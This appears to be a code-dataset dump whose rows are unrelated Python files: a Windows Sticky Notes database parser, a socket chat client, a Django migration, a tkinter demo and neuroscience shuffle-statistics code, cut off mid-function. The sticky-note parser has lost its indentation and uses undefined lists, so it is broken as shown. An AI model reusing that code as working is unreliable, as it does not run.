note_column_name_list = ["Text", "IsOpen", "Id", "CreatedAt", "UpdatedAt"]
our_db_column_name = ["Note_Id", "Type", "Content", "Activated", "CreatedTime", "ModifiedTime"]
def Parse2Type(data):
return data
def Parse2FilePath(data):
removable_text = "ms-appdata:///local/media/"
if removable_text in data:
result = data.replace(removable_text, "")
return result
def Parse2TimeStamp(data):
if data == 0:
return 0
return datetime.datetime.fromtimestamp(data / 10000000 - 62135596800).strftime('%Y-%m-%dT%H:%M:%S.%f')+'Z'
def Parse2Active(data):
if data == 1:
return "Open"
else:
return "Close"
def Parse2Id(data):
return data
def Parse2Text(data):
# id의 정규표현식 : \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}
p = re.compile("\\\\id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}")
data = re.sub(p, "", data)
return data
def saveDataInDict(our_db, output_column_name, data):
our_db[output_column_name] = data
def ParseColumn(temp_result_dictionary, data, column_name, sep):
if sep == "Media":
saveDataInDict(temp_result_dictionary, "Activated", "NULL")
if column_name in media_file_path_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2FilePath(data))
elif column_name in media_mime_type_list:
saveDataInDict(temp_result_dictionary, "Type", Parse2Type(data))
# elif column_name in media_id_list:
# temp_result_dictionary["Media_Id"] = Parse2Id(data)
elif column_name in media_parent_id_list:
# 결과 값에서 Text와 image를 엮기 위해서 ParentId를 Id로 바꿔줌
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
elif sep == "Note":
saveDataInDict(temp_result_dictionary, "Type", "Text")
if column_name in note_text_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2Text(data))
elif column_name in note_is_open_list:
saveDataInDict(temp_result_dictionary, "Activated", Parse2Active(data))
elif column_name in note_id_list:
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
def convertSntResult(id, dictionary):
our_db = dict()
saveDataInDict(our_db, "Type", "text")
saveDataInDict(our_db, "Activated", "NULL")
saveDataInDict(our_db, "Note_Id", id)
saveDataInDict(our_db, "CreatedTime", dictionary["created_time"])
saveDataInDict(our_db, "ModifiedTime", dictionary["modified_time"])
saveDataInDict(our_db, "Content", dictionary["content"])
result = convertDictionaryToList(our_db)
return result
def convertDictionaryToList(dict):
result = list()
for output_column_name in our_db_column_name:
result.append(dict[output_column_name])
return result
def divide2column(row, column_name_list, sep):
result_sql = dict()
for i in range(0, len(column_name_list)):
ParseColumn(result_sql, row[i], column_name_list[i], sep)
result = convertDictionaryToList(result_sql)
return result
def ParseSnt(file):
ole = olefile.OleFileIO(file)
result = dict()
for stream in ole.listdir():
if stream[0].count("-") == 3 and stream[1] == "3":
created_time = ole.getctime(stream[0])
modified_time = ole.getmtime(stream[0])
content = ole.openstream((stream)).read().decode("utf-16").rstrip("\u0000")
result[stream[0]] = dict()
result_stream = result[stream[0]]
result_stream["created_time"] = str(created_time)
result_stream["modified_time"] = str(modified_time)
result_stream["content"] = content
return result
def SaveDataInDict(our_db, output_colume_name, data):
our_db[output_colume_name] = data
def STICKYNOTE(filename):
result = []
note_count = 0
'''
basepath = os.getcwd()
#filename = "[win10]_1809_가상환경_plum.sqlite"
target_file = basepath + "//" + filename
'''
target_file = filename
# olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1
# sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00
if not olefile.isOleFile(target_file):
conn = sqlite3.connect(target_file)
cur = conn.cursor()
sql_command = "SELECT "
for column_name in note_column_name_list:
sql_command += column_name
if column_name is not note_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Note"
note_data = cur.execute(sql_command)
for row in note_data:
note_data_row = divide2column(row, note_column_name_list, "Note")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = note_data_row[0]
result[note_count].type = note_data_row[1]
result[note_count].content = note_data_row[2]
result[note_count].activated = note_data_row[3]
result[note_count].createdtime = note_data_row[4]
result[note_count].modifiedtime = note_data_row[5]
note_count = note_count + 1
sql_command = "SELECT "
for column_name in media_column_name_list:
sql_command += column_name
if column_name is not media_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Media"
media_data = cur.execute(sql_command)
for row in media_data:
media_data_row = divide2column(row, media_column_name_list, "Media")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = media_data_row[0]
result[note_count].type = media_data_row[1]
result[note_count].content = ''.join(media_data_row[2].split())
result[note_count].activated = media_data_row[3]
result[note_count].createdtime = media_data_row[4]
result[note_count].modifiedtime = media_data_row[5]
note_count = note_count + 1
elif olefile.isOleFile(target_file):
result_snt = ParseSnt(target_file)
for key, value in result_snt.items():
rs = convertSntResult(key, value)
result.append(rs)
return result | ko | 0.155269 | # -*- coding:utf-8 -*- testcase 1.[win7]_가상환경_StickyNotes.snt # id의 정규표현식 : \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12} # elif column_name in media_id_list: # temp_result_dictionary["Media_Id"] = Parse2Id(data) # 결과 값에서 Text와 image를 엮기 위해서 ParentId를 Id로 바꿔줌 basepath = os.getcwd() #filename = "[win10]_1809_가상환경_plum.sqlite" target_file = basepath + "//" + filename # olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1 # sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00 | 2.547248 | 3 |
com/client.py | clllllllllc/unicorn-pancake | 0 | 6632485 | import threading
import socket
host = '10.173.16.225'
port = 55554
nickname = input("Please Enter Nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "nick":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
| import threading
import socket
host = '10.173.16.225'
port = 55554
nickname = input("Please Enter Nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
def receive():
while True:
try:
message = client.recv(1024).decode('ascii')
if message == "nick":
client.send(nickname.encode('ascii'))
else:
print(message)
except:
print("error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input("")}'
client.send(message.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
| none | 1 | 3.004477 | 3 |
|
conf/migrations/0001_initial.py | abingprogrammer/OnlineJudge-master | 0 | 6632486 | <reponame>abingprogrammer/OnlineJudge-master
# Generated by Django 2.0.1 on 2018-04-26 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='JudgeServer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=128)),
('ip', models.CharField(blank=True, max_length=32, null=True)),
('judger_version', models.CharField(max_length=32)),
('cpu_core', models.IntegerField()),
('memory_usage', models.FloatField()),
('cpu_usage', models.FloatField()),
('last_heartbeat', models.DateTimeField()),
('create_time', models.DateTimeField(auto_now_add=True)),
('task_number', models.IntegerField(default=0)),
('service_url', models.CharField(blank=True, max_length=256, null=True)),
('is_disabled', models.BooleanField(default=False)),
],
options={
'db_table': 'judge_server',
},
),
]
| # Generated by Django 2.0.1 on 2018-04-26 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='JudgeServer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hostname', models.CharField(max_length=128)),
('ip', models.CharField(blank=True, max_length=32, null=True)),
('judger_version', models.CharField(max_length=32)),
('cpu_core', models.IntegerField()),
('memory_usage', models.FloatField()),
('cpu_usage', models.FloatField()),
('last_heartbeat', models.DateTimeField()),
('create_time', models.DateTimeField(auto_now_add=True)),
('task_number', models.IntegerField(default=0)),
('service_url', models.CharField(blank=True, max_length=256, null=True)),
('is_disabled', models.BooleanField(default=False)),
],
options={
'db_table': 'judge_server',
},
),
] | en | 0.791378 | # Generated by Django 2.0.1 on 2018-04-26 15:47 | 1.87201 | 2 |
Project1.py | varnaugj/Python-Early-Codes | 0 | 6632487 |
from tkinter import *
import tkinter as tk
window = tk.Tk()
greeting = tk.Label(text="Test 123")
greeting.pack()
def returnEntry(arg=None):
name = myEntry.get()
resultLabel.config(text= name)
myEntry.delete(0,END)
myEntry = tk.Entry(width=20)
myEntry.focus()
myEntry.bind("<Return>", returnEntry)
myEntry.pack()
button = tk.Button(text="Yeet me!", command=returnEntry, width=25, height=5)
button.pack(fill=X)
resultLabel = tk.Label(text="")
resultLabel.pack(fill=X)
window.mainloop()
#val = input("Enter Text here: ")
#print(val)
#entry = tk.Entry(fg="black",bg="white", width=50)
#entry.pack()
|
from tkinter import *
import tkinter as tk
window = tk.Tk()
greeting = tk.Label(text="Test 123")
greeting.pack()
def returnEntry(arg=None):
name = myEntry.get()
resultLabel.config(text= name)
myEntry.delete(0,END)
myEntry = tk.Entry(width=20)
myEntry.focus()
myEntry.bind("<Return>", returnEntry)
myEntry.pack()
button = tk.Button(text="Yeet me!", command=returnEntry, width=25, height=5)
button.pack(fill=X)
resultLabel = tk.Label(text="")
resultLabel.pack(fill=X)
window.mainloop()
#val = input("Enter Text here: ")
#print(val)
#entry = tk.Entry(fg="black",bg="white", width=50)
#entry.pack()
| en | 0.277602 | #val = input("Enter Text here: ") #print(val) #entry = tk.Entry(fg="black",bg="white", width=50) #entry.pack() | 3.9277 | 4 |
opendirection/stats/tools.py | adamltyson/opendirection | 0 | 6632488 | <reponame>adamltyson/opendirection
import logging
import random
import numpy as np
import multiprocessing as mp
from scipy.stats import percentileofscore
from imlib.general.system import sanitize_num_processes
import opendirection.spikes.tools as spike_tools
import opendirection.tools.tools as tools
MIN_PROCESSES = 1
def apply_random_sign(number):
sign = 1 if random.random() < 0.5 else -1
return sign * number
def generic_parallel_shuffle_test(
specific_test,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=False,
):
# Define an output queue
output = mp.Queue()
args = (output, *args) # add output to args
# array of shuffle magnitudes to go through
shuffle_dists = np.random.randint(
min_shuffle_dist, high=max_shuffle_dist, size=num_iterations
)
# split up the shuffle magnitudes into blocks for each process
shuffle_dist_blocks = np.array_split(shuffle_dists, num_processes)
# Setup a list of processes
processes = [
mp.Process(
target=specific_test, args=(shuffle_dist_blocks[process], *args)
)
for process in range(0, num_processes)
]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if two_lists:
# Get process results from the output queue
output_tmp = [output.get() for p in processes]
all_vals_1 = output_tmp[0][0]
all_vals_2 = output_tmp[0][1]
for i in range(1, len(output_tmp)):
all_vals_1 = np.append(all_vals_1, output_tmp[i][0])
all_vals_2 = np.append(all_vals_2, output_tmp[i][1])
return all_vals_1, all_vals_2
else:
# Get process results from the output queue
vals_tmp = [output.get() for p in processes]
all_vals = vals_tmp[0]
for i in range(1, len(vals_tmp)):
all_vals = np.append(all_vals, vals_tmp[i])
return all_vals
def run_hd_shuffled_stats(
vec_length_real,
stability_index_real,
head_angles_all,
spike_train,
head_angle_sampling,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
bin_spacing=0.105,
num_iterations=1000,
threshold=1,
smooth_width=None,
parallel=False,
num_processes=10,
):
"""
:param vec_length_real: "Real" (i.e. unshuffled) mean vector length
:param head_angles_all: Head angle at bin (wrapped)
:param spike_train: Number of spikes per bin
:param head_angle_sampling: Relative occupancy of bins
:param camera_frames_per_sec: Calibration
:param bin_spacing: In radians
:param num_iterations: How many shuffling iterations (default: 1000)
:param threshold: Number of spikes per bin for it to be
classed as active (default: 1)
:param bool parallel: If true, split up the shuffle iterations across
multiple CPU cores.
:param int num_processes: If 'parallel', how many processes to use.
Default: 10
:return:
"""
# todo: combine with opendirection.spikes.tools.get_direction_per_spike
head_angles_all = np.array(np.deg2rad(head_angles_all))
spike_train = np.array(spike_train)
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
angles_w_firing = head_angles_all[(spike_train >= threshold)]
firing_weighting = spike_train[(spike_train >= threshold)]
spikes_per_bin, bin_centers = spike_tools.get_spike_hist_single(
np.rad2deg(angles_w_firing),
firing_weighting,
np.rad2deg(bin_spacing),
head_angle_sampling,
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
)
(
vec_length_shuffled,
stability_index_shuffled,
) = generic_parallel_shuffle_test(
hd_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else:
vec_length_shuffled = np.empty(num_iterations)
stability_index_shuffled = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
vec_length_shuffled[iteration],
stability_index_shuffled[iteration],
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_length_percentile = percentileofscore(
vec_length_shuffled, vec_length_real
)
stability_index_percentile = percentileofscore(
abs(stability_index_shuffled), abs(stability_index_real)
)
return vec_length_percentile, stability_index_percentile
def hd_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
):
vec_lengths = []
stability_indices = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(
vec_length,
stability_index,
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_lengths.append(vec_length)
stability_indices.append(stability_index)
vec_lengths = np.array(vec_lengths)
stability_indices = np.array(stability_indices)
output.put([vec_lengths, stability_indices])
def is_ahv_cell_sig(
pearson_r_neg_real,
pearson_r_pos_real,
bin_centers,
spike_train,
ahv_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
correlation_mag_force=True,
parallel=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
)
pearson_r_neg, pearson_r_pos = generic_parallel_shuffle_test(
ahv_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else: # if parallel doesn't work
logging.warning("Running serial shuffling")
pearson_r_neg = np.empty(num_iterations)
pearson_r_pos = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
(pearson_r_neg[iteration], pearson_r_pos[iteration]),
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
# if only care about magnitude of correlation
if correlation_mag_force:
pearson_r_neg = abs(pearson_r_neg)
pearson_r_pos = abs(pearson_r_pos)
pearson_r_neg_real = abs(pearson_r_neg_real)
pearson_r_pos_real = abs(pearson_r_pos_real)
real_percentile_neg = percentileofscore(pearson_r_neg, pearson_r_neg_real)
real_percentile_pos = percentileofscore(pearson_r_pos, pearson_r_pos_real)
return real_percentile_neg, real_percentile_pos, shuffled_binned_data
def ahv_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
):
pearson_r_neg = []
pearson_r_pos = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(r_neg, r_pos), shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
pearson_r_neg.append(r_neg)
pearson_r_pos.append(r_pos)
pearson_r_neg = np.array(pearson_r_neg)
pearson_r_pos = np.array(pearson_r_pos)
output.put([pearson_r_neg, pearson_r_pos])
def is_velocity_cell_sig(
pearson_real,
bin_centers,
spike_train,
velocity_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
parallel=False,
correlation_mag_force=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
)
pearson = generic_parallel_shuffle_test(
velocity_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running serial shuffling")
pearson = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
pearson[iteration],
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
velocity_vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
if correlation_mag_force:
pearson = abs(pearson)
pearson_real = abs(pearson_real)
real_percentile_val = percentileofscore(pearson, pearson_real)
return real_percentile_val, shuffled_binned_data
def velocity_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
vals_timecourse,
bin_times_in_range,
):
pearson = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
r, shuffled_binned_data = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
vals_timecourse,
bin_times_in_range,
sanitise_values=True,
)
pearson.append(r)
pearson = np.array(pearson)
output.put(pearson)
def is_place_cell_sig(
real_peak,
bin_centers,
spike_train,
x,
y,
bin_occupancy,
smoothing=None,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
sanitise_values=True,
min_time_in_spatial_bin=0,
parallel=False,
):
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
bin_centers_x, bin_centers_y = bin_centers
bin_size = bin_centers_x[1] - bin_centers_x[0]
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
)
peaks = generic_parallel_shuffle_test(
place_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
)
else: # if parallel doesn't work
logging.warning("Not running parallel shuffling")
peaks = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
peaks[iteration] = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
real_percentile_val = percentileofscore(peaks, real_peak)
return real_percentile_val
def place_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_size,
x,
y,
bin_occupancy,
smoothing,
sanitise_values,
min_time_in_spatial_bin,
):
peaks = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
peak = spike_tools.place_peak_response(
spikes_shuffled,
bin_centers,
bin_size,
x,
y,
sanitise_values=sanitise_values,
min_time_in_spatial_bin=min_time_in_spatial_bin,
smoothing=smoothing,
bin_occupancy=bin_occupancy,
)
peaks.append(peak)
peaks = np.array(peaks)
output.put(peaks)
| import logging
import random
import numpy as np
import multiprocessing as mp
from scipy.stats import percentileofscore
from imlib.general.system import sanitize_num_processes
import opendirection.spikes.tools as spike_tools
import opendirection.tools.tools as tools
MIN_PROCESSES = 1
def apply_random_sign(number):
sign = 1 if random.random() < 0.5 else -1
return sign * number
def generic_parallel_shuffle_test(
specific_test,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=False,
):
# Define an output queue
output = mp.Queue()
args = (output, *args) # add output to args
# array of shuffle magnitudes to go through
shuffle_dists = np.random.randint(
min_shuffle_dist, high=max_shuffle_dist, size=num_iterations
)
# split up the shuffle magnitudes into blocks for each process
shuffle_dist_blocks = np.array_split(shuffle_dists, num_processes)
# Setup a list of processes
processes = [
mp.Process(
target=specific_test, args=(shuffle_dist_blocks[process], *args)
)
for process in range(0, num_processes)
]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
if two_lists:
# Get process results from the output queue
output_tmp = [output.get() for p in processes]
all_vals_1 = output_tmp[0][0]
all_vals_2 = output_tmp[0][1]
for i in range(1, len(output_tmp)):
all_vals_1 = np.append(all_vals_1, output_tmp[i][0])
all_vals_2 = np.append(all_vals_2, output_tmp[i][1])
return all_vals_1, all_vals_2
else:
# Get process results from the output queue
vals_tmp = [output.get() for p in processes]
all_vals = vals_tmp[0]
for i in range(1, len(vals_tmp)):
all_vals = np.append(all_vals, vals_tmp[i])
return all_vals
def run_hd_shuffled_stats(
vec_length_real,
stability_index_real,
head_angles_all,
spike_train,
head_angle_sampling,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
bin_spacing=0.105,
num_iterations=1000,
threshold=1,
smooth_width=None,
parallel=False,
num_processes=10,
):
"""
:param vec_length_real: "Real" (i.e. unshuffled) mean vector length
:param head_angles_all: Head angle at bin (wrapped)
:param spike_train: Number of spikes per bin
:param head_angle_sampling: Relative occupancy of bins
:param camera_frames_per_sec: Calibration
:param bin_spacing: In radians
:param num_iterations: How many shuffling iterations (default: 1000)
:param threshold: Number of spikes per bin for it to be
classed as active (default: 1)
:param bool parallel: If true, split up the shuffle iterations across
multiple CPU cores.
:param int num_processes: If 'parallel', how many processes to use.
Default: 10
:return:
"""
# todo: combine with opendirection.spikes.tools.get_direction_per_spike
head_angles_all = np.array(np.deg2rad(head_angles_all))
spike_train = np.array(spike_train)
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
angles_w_firing = head_angles_all[(spike_train >= threshold)]
firing_weighting = spike_train[(spike_train >= threshold)]
spikes_per_bin, bin_centers = spike_tools.get_spike_hist_single(
np.rad2deg(angles_w_firing),
firing_weighting,
np.rad2deg(bin_spacing),
head_angle_sampling,
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
)
(
vec_length_shuffled,
stability_index_shuffled,
) = generic_parallel_shuffle_test(
hd_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else:
vec_length_shuffled = np.empty(num_iterations)
stability_index_shuffled = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
vec_length_shuffled[iteration],
stability_index_shuffled[iteration],
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_length_percentile = percentileofscore(
vec_length_shuffled, vec_length_real
)
stability_index_percentile = percentileofscore(
abs(stability_index_shuffled), abs(stability_index_real)
)
return vec_length_percentile, stability_index_percentile
def hd_shuffle_parallel(
shuffle_dists,
output,
spike_train,
bin_centers,
bin_spacing,
head_angles_all,
head_angle_sampling,
threshold,
camera_frames_per_sec,
smooth_width,
):
vec_lengths = []
stability_indices = []
for i in range(0, len(shuffle_dists)):
spikes_shuffled = np.roll(
spike_train, apply_random_sign(shuffle_dists[i])
)
(
vec_length,
stability_index,
) = spike_tools.mean_vec_length_and_stability(
head_angles_all,
spikes_shuffled,
bin_centers,
bin_spacing,
head_angle_sampling,
camera_frames_per_sec,
smooth_width=smooth_width,
threshold=threshold,
)
vec_lengths.append(vec_length)
stability_indices.append(stability_index)
vec_lengths = np.array(vec_lengths)
stability_indices = np.array(stability_indices)
output.put([vec_lengths, stability_indices])
def is_ahv_cell_sig(
pearson_r_neg_real,
pearson_r_pos_real,
bin_centers,
spike_train,
ahv_vals_timecourse,
bin_times_in_range,
min_shuffle_dist_time=20,
max_shuffle_dist_time=0,
camera_frames_per_sec=None,
num_iterations=1000,
num_processes=10,
correlation_mag_force=True,
parallel=False,
):
shuffled_binned_data = []
parallel = sanitize_num_processes(
num_processes, MIN_PROCESSES, parallel=parallel
)
min_shuffle_dist = tools.shuffle_distances_in_units(
min_shuffle_dist_time, camera_frames_per_sec, spike_train
)
if max_shuffle_dist_time == 0:
max_shuffle_dist = len(spike_train) - min_shuffle_dist
else:
max_shuffle_dist = tools.shuffle_distances_in_units(
max_shuffle_dist_time, camera_frames_per_sec, spike_train
)
logging.debug("Running random shuffling")
if parallel:
args = (
spike_train,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
)
pearson_r_neg, pearson_r_pos = generic_parallel_shuffle_test(
ahv_shuffle_parallel,
min_shuffle_dist,
max_shuffle_dist,
num_iterations,
num_processes,
args,
two_lists=True,
)
else: # if parallel doesn't work
logging.warning("Running serial shuffling")
pearson_r_neg = np.empty(num_iterations)
pearson_r_pos = np.empty(num_iterations)
for iteration in range(0, num_iterations):
logging.debug("Iteration: " + str(iteration))
rand_shuffle = apply_random_sign(
np.random.randint(min_shuffle_dist, high=max_shuffle_dist)
)
spikes_shuffled = np.roll(spike_train, rand_shuffle)
(
(pearson_r_neg[iteration], pearson_r_pos[iteration]),
_shuffled_binned_data,
) = spike_tools.get_correlations(
spikes_shuffled,
bin_centers,
ahv_vals_timecourse,
bin_times_in_range,
pos_neg_separate=True,
)
shuffled_binned_data.append(_shuffled_binned_data)
# if only care about magnitude of correlation
if correlation_mag_force:
pearson_r_neg = abs(pearson_r_neg)
pearson_r_pos = abs(pearson_r_pos)
pearson_r_neg_real = abs(pearson_r_neg_real)
pearson_r_pos_real = abs(pearson_r_pos_real)
real_percentile_neg = percentileofscore(pearson_r_neg, pearson_r_neg_real)
